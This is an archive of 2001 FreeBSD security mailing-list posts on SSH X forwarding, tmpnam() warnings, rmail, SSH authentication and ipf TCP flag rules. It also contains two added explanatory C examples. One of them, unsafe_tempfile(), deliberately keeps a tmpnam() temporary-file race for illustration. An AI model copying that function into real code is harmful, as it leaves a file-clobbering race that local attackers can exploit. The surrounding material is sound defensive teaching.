Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If you do ssh -v -v -X user@host, and you do this from within an X terminal
(so there is an X session to forward to ;), is there some XAUTHORITY output
at the end?

If not, then:
- Is X installed on the server host?
- Is there a /usr/X11R6/bin/xauth on the server host, executable by your user?
- Are you really sure you're running the client from within an X session? :)

G'luck,
Peter

--
You have, of course, just begun reading the sentence that you have just finished reading.

On Fri, Jun 08, 2001 at 03:27:58PM -0400, Rob Simmons wrote:
> With X forwarding on in /etc/ssh/sshd_config:
> X11Forwarding yes
>
> and using
> ssh -X @
>
> I don't see any ssh files in /tmp. Does this bug apply to FreeBSD's
> version of OpenSSH?
>
> Robert Simmons
> Systems Administrator
> http://www.wlcg.com/
>
> On Wed, 6 Jun 2001, Neil Blakey-Milner wrote:
>
> > On Wed 2001-06-06 (12:48), Andreas Haugsnes wrote:
> > > I've tested it with FreeBSD 4.3, and I have not found this bug
> > > to apply.
> >
> > Are you using X forwarding? (ie, ssh -X)

From owner-freebsd-security Fri Jun 8 12:47:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id A671D37B401 for ; Fri, 8 Jun 2001 12:47:28 -0700 (PDT) (envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f58JlEF59281; Fri, 8 Jun 2001 15:47:14 -0400 (EDT) (envelope-from rsimmons@wlcg.com)
Date: Fri, 8 Jun 2001 15:47:10 -0400 (EDT)
From: Rob Simmons
To: Peter Pentchev
Cc: Neil Blakey-Milner, Andreas Haugsnes, security@FreeBSD.ORG
Subject: Re: [fwd] SSH allows deletion of other users files...
In-Reply-To: <20010608223400.C54030@ringworld.oblivion.bg>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hmmm... It works. I'm going to shut up now :)

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Fri, 8 Jun 2001, Peter Pentchev wrote:

> If you do ssh -v -v -X user@host, and you do this from within an X terminal
> (so there is an X session to forward to ;), is there some XAUTHORITY output
> at the end?
>
> If not, then:
> - Is X installed on the server host?
> - Is there a /usr/X11R6/bin/xauth on the server host, executable by your user?
> - Are you really sure you're running the client from within an X session? :)
>
> G'luck,
> Peter
>
> --
> You have, of course, just begun reading the sentence that you have just finished reading.
>
> On Fri, Jun 08, 2001 at 03:27:58PM -0400, Rob Simmons wrote:
> > With X forwarding on in /etc/ssh/sshd_config:
> > X11Forwarding yes
> >
> > and using
> > ssh -X @
> >
> > I don't see any ssh files in /tmp. Does this bug apply to FreeBSD's
> > version of OpenSSH?
> >
> > Robert Simmons
> > Systems Administrator
> > http://www.wlcg.com/
> >
> > On Wed, 6 Jun 2001, Neil Blakey-Milner wrote:
> >
> > > On Wed 2001-06-06 (12:48), Andreas Haugsnes wrote:
> > > > I've tested it with FreeBSD 4.3, and I have not found this bug
> > > > to apply.
> > >
> > > Are you using X forwarding? (ie, ssh -X)

From owner-freebsd-security Fri Jun 8 13:26:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tomts7-srv.bellnexxia.net (tomts7.bellnexxia.net [209.226.175.40]) by hub.freebsd.org (Postfix) with ESMTP id 750A637B403 for ; Fri, 8 Jun 2001 13:26:28 -0700 (PDT) (envelope-from glassfish@glassfish.net)
Received: from frogbox.glassfish.net ([64.230.57.207]) by tomts7-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010608202627.CHNL19826.tomts7-srv.bellnexxia.net@frogbox.glassfish.net> for ; Fri, 8 Jun 2001 16:26:27 -0400
Received: (qmail 22761 invoked from network); 8 Jun 2001 20:26:26 -0000
Received: from unknown (HELO MAINWS) (192.0.0.80) by 192.0.0.4 with SMTP; 8 Jun 2001 20:26:26 -0000
From: "Michael Tang Helmeste"
To: "Buliwyf McGraw"
Subject: RE: Unsafe Message
Date: Fri, 8 Jun 2001 16:26:14 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Well, this may be changed in newer versions of the library, or you could go
into the code yourself and change it. Personally I don't like going into
other people's code, but if you really want to fix this, then the best of
luck to you :)
There's not much other answer that I can provide other than this, sorry.

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Buliwyf McGraw
Sent: Thursday, June 07, 2001 10:30 PM
To: Michael Tang Helmeste
Cc: security@FreeBSD.ORG
Subject: RE: Unsafe Message

> If its not in your code, its most likely in one of the libraries that it
> uses.

Thanks for your answer.
I was reading the man pages of the functions:

tmpnam()
    tempnam, tmpfile, tmpnam - temporary file routines
mkstemp()
    make temporary file name (unique)

But I am not sure about how to improve the libraries... I mean, is there a
patch or something for this specific error???

Thanks for any "smart" answer.

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Chris Johnson
> Sent: Thursday, June 07, 2001 9:36 PM
> To: Buliwyf McGraw
> Cc: security@FreeBSD.ORG
> Subject: Re: Unsafe Message
>
> On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote:
> > Everytime that i compile something on my server, i get this message:
> >
> > warning: tmpnam() possibly used unsafely; consider using mkstemp()
> >
> > What it means?
>
> tmpnam() was possibly used unsafely
>
> > how i can avoid it?
>
> consider using mkstemp()
>
> Chris

=======================================================================
Buliwyf McGraw
Administrator of the Libertad Server
Centro de Servicios de Informacion
Universidad del Valle
=======================================================================

From owner-freebsd-security Fri Jun 8 13:38:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id EDDB137B401 for ; Fri, 8 Jun 2001 13:38:55 -0700 (PDT) (envelope-from gshapiro@gshapiro.net)
Received: from horsey.gshapiro.net (gshapiro@localhost [127.0.0.1]) by horsey.gshapiro.net (8.12.0.Beta11/8.12.0.Beta11) with ESMTP id f58Kcs4N068068 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Fri, 8 Jun 2001 13:38:54 -0700 (PDT)
Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta11/8.12.0.Beta11) id f58KcsTr068065; Fri, 8 Jun 2001 13:38:54 -0700 (PDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15137.14301.996243.90366@horsey.gshapiro.net>
Date: Fri, 8 Jun 2001 13:38:53 -0700
From: Gregory Neil Shapiro
To: Lyndon Nerenberg
Cc: Garrett Wollman, Peter Pentchev, freebsd-security@FreeBSD.ORG
Subject: Re: /bin/rmail (was: root & toor)
In-Reply-To: <200106081936.f58Jaq556650@orthanc.ab.ca>
References: <200106081914.f58JEq556483@orthanc.ab.ca> <200106081936.f58Jaq556650@orthanc.ab.ca>
X-Mailer: VM 6.92 under 21.5 (beta1) "anise" XEmacs Lucid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Lyndon> The only other issue is local execution of /bin/rmail by
Lyndon> programs other than uuxqt. A grep through the source tree
Lyndon> doesn't show any other program invoking rmail.

lyndon> And of course I meant "other than sendmail."

sendmail doesn't invoke rmail. rmail invokes sendmail.

From owner-freebsd-security Fri Jun 8 13:59:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from orthanc.ab.ca (orthanc.ab.ca [207.167.3.130]) by hub.freebsd.org (Postfix) with ESMTP id 01B8237B406; Fri, 8 Jun 2001 13:59:55 -0700 (PDT) (envelope-from lyndon@orthanc.ab.ca)
Received: from orthanc.ab.ca (localhost [127.0.0.1]) by orthanc.ab.ca (8.11.2/8.11.2) with ESMTP id f58Kxs557021; Fri, 8 Jun 2001 14:59:54 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca)
Message-Id: <200106082059.f58Kxs557021@orthanc.ab.ca>
From: Lyndon Nerenberg
Organization: The Frobozz Magic Homing Pigeon Company
To: Gregory Neil Shapiro
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: /bin/rmail (was: root & toor)
In-reply-to: Your message of "Fri, 08 Jun 2001 13:38:53 PDT." <15137.14301.996243.90366@horsey.gshapiro.net>
Date: Fri, 08 Jun 2001 14:59:54 -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>>>>> "Gregory" == Gregory Neil Shapiro writes:

    Gregory> sendmail doesn't invoke rmail. rmail invokes sendmail.

I was being pedantic. Sendmail does invoke rmail, but only on ancient
HP/UX boxen, and they use /usr/bin/rmail.

--lyndon

From owner-freebsd-security Fri Jun 8 14: 6:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from superconductor.rush.net (superconductor.rush.net [208.9.155.8]) by hub.freebsd.org (Postfix) with ESMTP id ECCC637B401 for ; Fri, 8 Jun 2001 14:06:48 -0700 (PDT) (envelope-from bright@superconductor.rush.net)
Received: (from bright@localhost) by superconductor.rush.net (8.11.2/8.11.2) id f58L6FV21153; Fri, 8 Jun 2001 17:06:15 -0400 (EDT)
Date: Fri, 8 Jun 2001 17:06:14 -0400
From: Alfred Perlstein
To: Michael Tang Helmeste
Cc: Buliwyf McGraw, security@FreeBSD.ORG
Subject: Re: Unsafe Message
Message-ID: <20010608170613.I1832@superconductor.rush.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0us
In-Reply-To: ; from glassfish@frogbox.dyndns.org on Fri, Jun 08, 2001 at 04:26:14PM -0400
X-all-your-base: are belong to us.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Please trim your messages, please get a mail client that quotes messages
properly.

> > On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote:
> > > Everytime that i compile something on my server, i get this message:
> > >
> > > warning: tmpnam() possibly used unsafely; consider using mkstemp()
> > >
> > > What it means?

* Michael Tang Helmeste [010608 16:26] wrote:
> Well, this may be changed in newer versions of the library, or you could go
> into the code yourself and change it. Personally I don't like going into
> other people's code, but if you really want to fix this, then the best of
> luck to you :)
> Theres not much other answer that I can provide other than this, sorry.

tmpnam() is unsafe because it only gives you a name in memory, the file
name that it generates is still not actually created, so if you go ahead
and blindly create/open the filename you get back from tmpnam() you may
lose a race against something else trying to dupe you into opening or
clobbering something you shouldn't.

mkstemp() is safe because it actually generates the file for you and
creates it with reasonable permissions:

     The mkstemp() function makes the same replacement to the template and
     creates the template file, mode 0600, returning a file descriptor
     opened for reading and writing. This avoids the race between testing
     for a file's existence and opening it for use.
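Alfred's two points, as an added example that is not part of his reply and not FreeBSD's libc: the name-then-open pattern tmpnam() invites, beside the mkstemp() form, plus the fstat() and O_EXCL checks a caller can make afterwards. The example.XXXXXX template, the TMPDIR fallback and the open_fresh() helper are assumptions of this example.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * The pattern the linker warns about.  tmpnam() only returns a name; no
 * file exists yet.  Between the tmpnam() call and the open() below, anyone
 * with write access to the directory can create that path (a symlink to a
 * file we would never knowingly write to, say).  open() with O_CREAT but
 * without O_EXCL then follows it and truncates the target with our
 * privileges.  Kept only to show the hole; not for use.
 */
int unsafe_tempfile(char *path, size_t pathlen)
{
    char name[L_tmpnam];

    if (tmpnam(name) == NULL || strlen(name) >= pathlen)
        return -1;
    strcpy(path, name);
    /* The window: the name is known, but the file is not yet ours. */
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0600);
}

/*
 * mkstemp() fills in the XXXXXX *and* creates the file in the same call,
 * with O_CREAT|O_EXCL and mode 0600.  If the path already exists the call
 * fails instead of opening whatever was planted there; that is the "race
 * between testing for a file's existence and opening it" the man page
 * refers to.
 */
int safe_tempfile(char *path, size_t pathlen)
{
    const char *dir = getenv("TMPDIR");   /* assumption: honour TMPDIR */
    struct stat st;
    int fd;

    if (dir == NULL || *dir == '\0')
        dir = "/tmp";
    if (snprintf(path, pathlen, "%s/example.XXXXXX", dir) >= (int)pathlen)
        return -1;
    fd = mkstemp(path);
    if (fd < 0)
        return -1;
    /* Check the descriptor we hold, not the path (the path can change
     * again): a regular file with one link, private to us. */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        (st.st_mode & 0777) != 0600) {
        close(fd);
        unlink(path);
        return -1;
    }
    return fd;
}

/*
 * The same guarantee for a caller that must use a fixed path: O_EXCL makes
 * creation fail with EEXIST if anything is already there, and O_NOFOLLOW
 * refuses to go through a symlink.  Returns -1 and sets errno on failure.
 */
int open_fresh(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

int main(void)
{
    char path[256];
    int fd = safe_tempfile(path, sizeof path);

    if (fd < 0) {
        perror("mkstemp");
        return 1;
    }
    printf("created %s\n", path);
    /* A second exclusive create of the same name must be refused. */
    if (open_fresh(path) < 0 && errno == EEXIST)
        printf("second O_EXCL create refused with EEXIST, as expected\n");
    close(fd);
    unlink(path);
    return 0;
}
```

Linking this with a modern libc reproduces the very warning Buliwyf asked about, because unsafe_tempfile() still references tmpnam().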
This has been discussed on many lists, many times in the past.

--
-Alfred Perlstein [alfred@freebsd.org]
Instead of asking why a piece of software is using "1970s technology,"
start asking why software is ignoring 30 years of accumulated wisdom.

From owner-freebsd-security Fri Jun 8 16:19:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id DE0F437B407 for ; Fri, 8 Jun 2001 16:19:07 -0700 (PDT) (envelope-from crist.clark@globalstar.com)
Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GEMWR500.9GT; Fri, 8 Jun 2001 16:18:41 -0700
Message-ID: <3B215D6A.9E968BAE@globalstar.com>
Date: Fri, 08 Jun 2001 16:19:06 -0700
From: "Crist Clark"
Organization: Globalstar LP
X-Mailer: Mozilla 4.77 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Michael Avdeev
Cc: Misha Kamushkin, freebsd-security@FreeBSD.ORG
Subject: Re: openssh auth. problem
References: <9C643FE251025246BF8CE3ADFA3765954873@hydrogen.tmolp.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Michael Avdeev wrote:
>
> i actually finally got it to work with publickey authentication. i
> generated a key and copied it to the server. i called the file
> authorized_keys2. what i initially planned to do is to have
> hostbasedauthentication. what's the difference between hostbased and
> publickey.

Host-based authentication _is_ public-key-crypto based in SSH. Instead of
using the user's key pairs, the host key pairs are used.

> i cant get it to work using hostbasedauth. thanks for your
> help.

You want to enable RhostRSAAuthentication for host-key based
authentication (beyond just the "known-host" check).

--
Crist J. Clark                                Network Security Engineer
crist.clark@globalstar.com                    Globalstar, L.P.
(408) 933-4387                                FAX: (408) 933-4926

The information contained in this e-mail message is confidential, intended
only for the use of the individual or entity named above. If the reader of
this e-mail is not the intended recipient, or the employee or agent
responsible to deliver it to the intended recipient, you are hereby notified
that any review, dissemination, distribution or copying of this
communication is strictly prohibited. If you have received this e-mail in
error, please contact postmaster@globalstar.com

From owner-freebsd-security Fri Jun 8 17: 8:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from onion.ish.org (onion.ish.org [210.145.219.202]) by hub.freebsd.org (Postfix) with ESMTP id E966537B405 for ; Fri, 8 Jun 2001 17:08:43 -0700 (PDT) (envelope-from ishizuka@ish.org)
Received: from localhost (ishizuka@localhost [127.0.0.1]) by onion.ish.org (8.11.3/8.11.3/2001-05-23) with ESMTP id f5908fK07119 for ; Sat, 9 Jun 2001 09:08:41 +0900 (JST) (envelope-from ishizuka@ish.org)
To: freebsd-security@FreeBSD.ORG
Subject: RE: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts
In-Reply-To: <20010608164526.4F02437B405@hub.freebsd.org>
References: <20010608164526.4F02437B405@hub.freebsd.org>
X-Mailer: Mew version 1.94.2 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA)
X-PGP-Fingerprint20: 276D 697A C2CB 1580 C683 8F18 DA98 1A4A 50D2 C4CB
X-PGP-Fingerprint16: C6 DE 46 24 D7 9F 22 EB 79 E2 90 AB 1B 9A 35 2E
X-PGP-Public-Key: http://www.ish.org/pgp-public-key.txt
X-URL: http://www.ish.org/
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20010609090841X.ishizuka@onion.ish.org>
Date: Sat, 09 Jun 2001 09:08:41 +0900
From: Masachika ISHIZUKA
X-Dispatcher: imput version 20000414(IM141)
Lines: 41
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>>> But it seems that:
>>> 1.
>>> # cd /usr/src/lib/libc
>>>
>>> should be /usr/src/lib/libc/gen, right?
>>>
>>> (now in which directory do I "make depend && make all install"?)
>>
>> No, it shouldn't.
>> src/lib/libc/gen contains only part of the libc sources - the so-called
>> 'generic' functions. In this case, you need to rebuild the whole of libc -
>> libc/gen only builds several object files, not a whole library.
>
> The patch didn't work for me until I cd-ed to .../gen
>
> Either the patch or the instructions should be fixed.

Dear sir.

I have the same question, above.
And I have more questions.
The following commands are not linked statically, why do we have to
recompile these commands ?

# cd /usr/src/usr.bin/du
# make depend && make all install
# cd /usr/src/usr.bin/find
# make depend && make all install
# cd /usr/src/usr.bin/chgrp
# make depend && make all install
# cd /usr/src/libexec/ftpd
# make depend && make all install
# cd /usr/src/usr.sbin/ckdist
# make depend && make all install
# cd /usr/src/usr.sbin/ctm
# make depend && make all install
# cd /usr/src/usr.sbin/mtree
# make depend && make all install
# cd /usr/src/usr.sbin/pkg_install
# make depend && make all install

--
ishizuka@ish.org

From owner-freebsd-security Fri Jun 8 17:39:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from imo-r02.mx.aol.com (imo-r02.mx.aol.com [152.163.225.98]) by hub.freebsd.org (Postfix) with ESMTP id C447E37B403 for ; Fri, 8 Jun 2001 17:39:17 -0700 (PDT) (envelope-from Bcole742@aol.com)
Received: from Bcole742@aol.com by imo-r02.mx.aol.com (mail_out_v30.22.) id n.9.16a7abea (3940) for ; Fri, 8 Jun 2001 20:39:15 -0400 (EDT)
From: Bcole742@aol.com
Message-ID: <9.16a7abea.2852ca32@aol.com>
Date: Fri, 8 Jun 2001 20:39:14 EDT
Subject: Mailing list
To: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="part1_9.16a7abea.2852ca32_boundary"
X-Mailer: AOL 6.0 for Windows US sub 10520
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I would like to receive your mailing list on freebsd security.
Thank you

From owner-freebsd-security Fri Jun 8 19:56:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mta5.rcsntx.swbell.net (mta5.rcsntx.swbell.net [151.164.30.29]) by hub.freebsd.org (Postfix) with ESMTP id 698B437B406 for ; Fri, 8 Jun 2001 19:56:24 -0700 (PDT) (envelope-from ryanpek@swbell.net)
Received: from mhx800 ([64.219.216.69]) by mta5.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GEN009AI6OWK4@mta5.rcsntx.swbell.net> for freebsd-security@FreeBSD.ORG; Fri, 8 Jun 2001 21:53:21 -0500 (CDT)
Date: Fri, 08 Jun 2001 21:53:17 -0500
From: Ryan
Subject: IPFILTER and flags S/SA
To: freebsd-security@FreeBSD.ORG
Message-id: <000601c0f08f$566f53e0$01000001@mhx800>
MIME-version: 1.0
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
Content-type: text/plain; charset="iso-8859-1"
Content-transfer-encoding: 7bit
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
References: <9C643FE251025246BF8CE3ADFA3765954873@hydrogen.tmolp.com> <3B215D6A.9E968BAE@globalstar.com>
X-Priority: 3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

from the IPF howto
-
Some examples use flags S/SA instead of flags S.
flags S actually equates to flags S/AUPRFS and
matches against only the SYN packet out of all six
possible flags, while flags S/SA will allow packets
that may or may not have the URG, PSH, FIN, or
RST flags set. Some protocols demand the URG or
PSH flags, and S/SAFR would be a better choice for
these, however we feel that it is less secure to
blindly use S/SA when it isn't required. But it's
your firewall.
-
I was wondering if any1 could maybe explain more in detail why S/SA is
unsafe?

example:
pass in quick on xl0 proto tcp from any to 64.219.216.65/32 port = 80 flags S keep state
pass in quick on xl0 proto tcp from any to 64.219.216.65/32 port = 80 flags S/SA keep state

ryanpek@swbell.net

From owner-freebsd-security Fri Jun 8 20:19:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id B274637B405 for ; Fri, 8 Jun 2001 20:19:10 -0700 (PDT) (envelope-from poige@morning.ru)
Received: from NIC1 ([195.161.98.236]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id LAA76066; Sat, 9 Jun 2001 11:18:59 +0800 (KRAST) (envelope-from poige@morning.ru)
Date: Sat, 9 Jun 2001 11:19:37 +0700
From: Igor Podlesny
X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091
Organization: Morning Network
X-Priority: 3 (Normal)
Message-ID: <19592974009.20010609111937@morning.ru>
To: Ryan
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPFILTER and flags S/SA
In-Reply-To: <000601c0f08f$566f53e0$01000001@mhx800>
References: <9C643FE251025246BF8CE3ADFA3765954873@hydrogen.tmolp.com> <3B215D6A.9E968BAE@globalstar.com> <000601c0f08f$566f53e0$01000001@mhx800>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> from the IPF howto
> -
> Some examples use flags S/SA instead of flags S.
> flags S actually equates to flags S/AUPRFS and
> matches against only the SYN packet out of all six
> possible flags, while flags S/SA will allow packets
> that may or may not have the URG, PSH, FIN, or
> RST flags set. Some protocols demand the URG or
> PSH flags, and S/SAFR would be a better choice for
> these, however we feel that it is less secure to
> blindly use S/SA when it isn't required. But it's
> your firewall.
> -
> I was wondering if any1 could maybe explain more in detail why S/SA is
> unsafe?

English isn't my native language, but it seems to me that the quotation
from IPF-howto does answer your question clearly. so I just expand it to you:

S/SA means check for S looking at S and A, other flags don't matter so it
will select packets with SYN set, even if it also has RST set.

In order to avoid such behavior, they suggest using S/SAFR which would
mean the next: Check if packet has SYN set, and none of (ACK, FIN, RST).
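Igor's reading of the mask notation, as an added example that is not part of his reply and not ipf's own source: the comparison is (packet flags AND mask) == required set, and a bare "S" masks against all six flags, as the howto states. The letter-to-bit mapping and the constructed packets are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* TCP flag bits, in the letter order used by ipf: F S R P A U (assumed). */
enum {
    TH_FIN = 0x01, TH_SYN = 0x02, TH_RST = 0x04,
    TH_PSH = 0x08, TH_ACK = 0x10, TH_URG = 0x20,
    TH_ALL = 0x3f   /* all six: what a bare "flags S" is masked against */
};

/* One ipf flag letter to its bit; 0 for anything that is not a flag. */
static unsigned flag_bit(char c)
{
    switch (c) {
    case 'F': return TH_FIN;
    case 'S': return TH_SYN;
    case 'R': return TH_RST;
    case 'P': return TH_PSH;
    case 'A': return TH_ACK;
    case 'U': return TH_URG;
    default:  return 0;
    }
}

/* Parse n letters such as "SAFR" into a bit set.  Returns 0 on a bad letter. */
int parse_flagset(const char *s, size_t n, unsigned *out)
{
    unsigned bits = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned b = flag_bit(s[i]);
        if (b == 0)
            return 0;
        bits |= b;
    }
    *out = bits;
    return 1;
}

/*
 * Parse the argument of an ipf "flags" keyword.  "X/Y" means: look only at
 * the bits in Y, and require exactly the bits of X among them.  A bare "X"
 * is "X/FSRPAU": every flag is looked at, so only an exact match passes.
 */
int parse_flags_rule(const char *spec, unsigned *set, unsigned *mask)
{
    const char *slash = strchr(spec, '/');
    size_t setlen = slash ? (size_t)(slash - spec) : strlen(spec);

    if (setlen == 0 || !parse_flagset(spec, setlen, set))
        return 0;
    if (slash == NULL) {
        *mask = TH_ALL;
        return 1;
    }
    return parse_flagset(slash + 1, strlen(slash + 1), mask);
}

/* The comparison made on a packet's flag byte: 1 match, 0 no match,
 * -1 for a spec that does not parse. */
int flags_match(const char *spec, unsigned pkt_flags)
{
    unsigned set, mask;

    if (!parse_flags_rule(spec, &set, &mask))
        return -1;
    return (pkt_flags & mask) == set;
}

/* Render a flag byte as letters, for the table printed by main(). */
static const char *flag_names(unsigned f, char buf[7])
{
    const char letters[] = "FSRPAU";
    int n = 0;
    for (int i = 0; i < 6; i++)
        if (f & (1u << i))
            buf[n++] = letters[i];
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    /* Constructed flag combinations, including the SYN+RST case Igor names. */
    const unsigned pkts[] = { TH_SYN, TH_SYN | TH_ACK, TH_SYN | TH_RST,
                              TH_SYN | TH_PSH, TH_SYN | TH_URG | TH_PSH };
    const char *specs[] = { "S", "S/SA", "S/SAFR" };
    char buf[7];

    printf("%-8s", "pkt");
    for (int j = 0; j < 3; j++)
        printf("%8s", specs[j]);
    putchar('\n');
    for (size_t i = 0; i < sizeof pkts / sizeof pkts[0]; i++) {
        printf("%-8s", flag_names(pkts[i], buf));
        for (int j = 0; j < 3; j++)
            printf("%8s", flags_match(specs[j], pkts[i]) == 1 ? "pass" : "-");
        putchar('\n');
    }
    return 0;
}
```

The SYN+RST row is the one to look at: it passes "S/SA" because R is outside the mask, and is refused by both "S" and "S/SAFR".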
> example:
> pass in quick on xl0 proto tcp from any to 64.219.216.65/32 port = 80 flags
> S keep state
> pass in quick on xl0 proto tcp from any to 64.219.216.65/32 port = 80 flags
> S/SA keep state
> ryanpek@swbell.net

--
Igor
http://poige.nm.ru
mailto:poige@morning.ru

From owner-freebsd-security Sat Jun 9 8:29:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 1497137B401 for ; Sat, 9 Jun 2001 08:29:13 -0700 (PDT) (envelope-from nkritsky@internethelp.ru)
Received: from ibmka (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with SMTP id TAA65264 for ; Sat, 9 Jun 2001 19:29:05 +0400 (MSD)
Message-ID: <027b01c0f0f8$ea521f20$0600a8c0@ibmka.internethelp.ru>
From: "Nickolay A. Kritsky"
Subject: security-advisories mailing list (Was: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts)
Date: Sat, 9 Jun 2001 19:28:59 +0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Just want to ask somebody in the security staff of FreeBSD (Mr Kennaway?):
why didn't "FreeBSD Security Advisory: FreeBSD-SA-01:40.fts" come to me,
though I was subscribed to security-advisories@freebsd.org? Maybe the list
is broken and I had better subscribe to another list?
Thanks for any help.

This is a snippet from the last message that came to my mailbox from
security-advisories@freebsd.org

Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f4SNLwY53233; Mon, 28 May 2001 16:21:58 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org)
Date: Mon, 28 May 2001 16:21:58 -0700 (PDT)
Message-Id: <200105282321.f4SNLwY53233@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:23.icecast [REVISED]

From owner-freebsd-security Sat Jun 9 10:19:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from audio.gfoster.com (24-168-222-182.mf.cox.rr.com [24.168.222.182]) by hub.freebsd.org (Postfix) with ESMTP id 36B4637B403 for ; Sat, 9 Jun 2001 10:19:21 -0700 (PDT) (envelope-from gfoster@audio.gfoster.com)
Received: (from gfoster@localhost) by audio.gfoster.com (8.11.3/8.11.3) id f59HIJ235191; Sat, 9 Jun 2001 13:18:19 -0400 (EDT) (envelope-from gfoster)
From: Glen Foster
MIME-Version: 1.0
